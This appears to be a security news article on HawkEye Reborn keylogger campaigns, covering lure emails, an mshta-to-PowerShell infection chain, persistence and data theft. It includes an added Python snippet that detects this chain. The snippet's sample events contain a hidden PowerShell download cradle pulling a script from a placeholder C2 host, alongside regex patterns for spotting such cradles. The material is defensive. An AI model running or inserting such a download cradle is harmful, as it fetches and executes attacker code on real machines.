“In the cybercrime arena, most financially motivated threat actors are focused on businesses because that is where they can make larger profits than attacks on individual users. Businesses have more data, many users on the same network and larger bank accounts that criminals prey on. X-Force is not surprised to see HawkEye operators follow the trend that’s become somewhat of a cybercrime norm,” X-Force specialists report.
The criminals are interested in confidential data and credentials, which are later used to take over accounts and to attack corporate email.
In addition, HawkEye can download further malware onto infected devices.
During the April and May spam campaigns, the attackers distributed HawkEye Reborn versions 8.0 and 9.0 in emails purporting to come from banks and other legitimate organizations; according to the researchers, however, the attached images were of low quality and the text was poorly formatted. The emails carried an archive containing the malicious file, which had been converted from PDF to PNG and then to LNK. When unpacked, it silently launched the keylogger while displaying a fake recipe to distract the user.
Several executables were used to infect devices. First, mshta.exe ran a PowerShell script that connected to the attackers’ command-and-control server, hosted on AWS, and downloaded additional components of the program. Second, gvg.exe contained an AutoIt script that ensured the keylogger started automatically after a system reboot.
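The mshta.exe to PowerShell to dropped-executable chain described above is exactly the kind of parent/child relationship a process-creation log can surface. The following is an added example, not code from the X-Force or Cisco Talos reports; the two rules, the event shape (modelled on Sysmon Event ID 1), the sample events and the placeholder C2 host are all my own assumptions.

```python
# Toy detection for the HawkEye Reborn delivery chain described above.
# Rules are my assumptions, not signatures from the X-Force or Talos reports:
#   1. mshta.exe spawns powershell.exe whose command line holds a download
#      cradle (the stage that pulls further components from the C2 server).
#   2. powershell.exe launches an executable from a user-writable directory
#      (the dropped gvg.exe stage).
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent image name
    image: str    # created process image name
    cmdline: str  # full command line

# Constructed sample events in the shape of Sysmon Event ID 1; the C2 host
# is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe",
              r"mshta.exe C:\Users\u\AppData\Local\Temp\invoice.hta"),
    ProcEvent("mshta.exe", "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient)"
              ".DownloadString('https://c2-placeholder.example/p.ps1')"),
    ProcEvent("powershell.exe", "gvg.exe", r"C:\Users\u\AppData\Roaming\gvg.exe"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell -c Get-Process"),  # benign
]

CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.I)

def rule_mshta_powershell_cradle(ev: ProcEvent) -> bool:
    return (ev.parent.lower() == "mshta.exe"
            and ev.image.lower() == "powershell.exe"
            and CRADLE.search(ev.cmdline) is not None)

def rule_powershell_runs_user_dir_exe(ev: ProcEvent) -> bool:
    return (ev.parent.lower() == "powershell.exe"
            and ev.image.lower().endswith(".exe")
            and USER_WRITABLE.search(ev.cmdline) is not None)

def detect(events):
    """Return (event index, rule name) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        if rule_mshta_powershell_cradle(ev):
            hits.append((i, "mshta_powershell_cradle"))
        if rule_powershell_runs_user_dir_exe(ev):
            hits.append((i, "powershell_runs_user_dir_exe"))
    return hits
```

Run against the constructed events, the two malicious stages are flagged and the benign administrative PowerShell call is not; in production the same rules would run over real process-creation telemetry rather than the inline list.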
Over the last six years the malware has gained multiple additional modules that extend its spying and data-theft capabilities. The latest version of the keylogger, HawkEye Reborn 9, can collect information from various applications and send it to its operators over the FTP, HTTP and SMTP protocols.
Experts say that in December 2018 the program passed to a new owner and is now distributed on dark net forums through intermediaries.
“The recent owner change and the renewed HawkEye Reborn development process demonstrate that this threat will develop in the future,” noted researchers from Cisco Talos.
Source: https://securityintelligence.com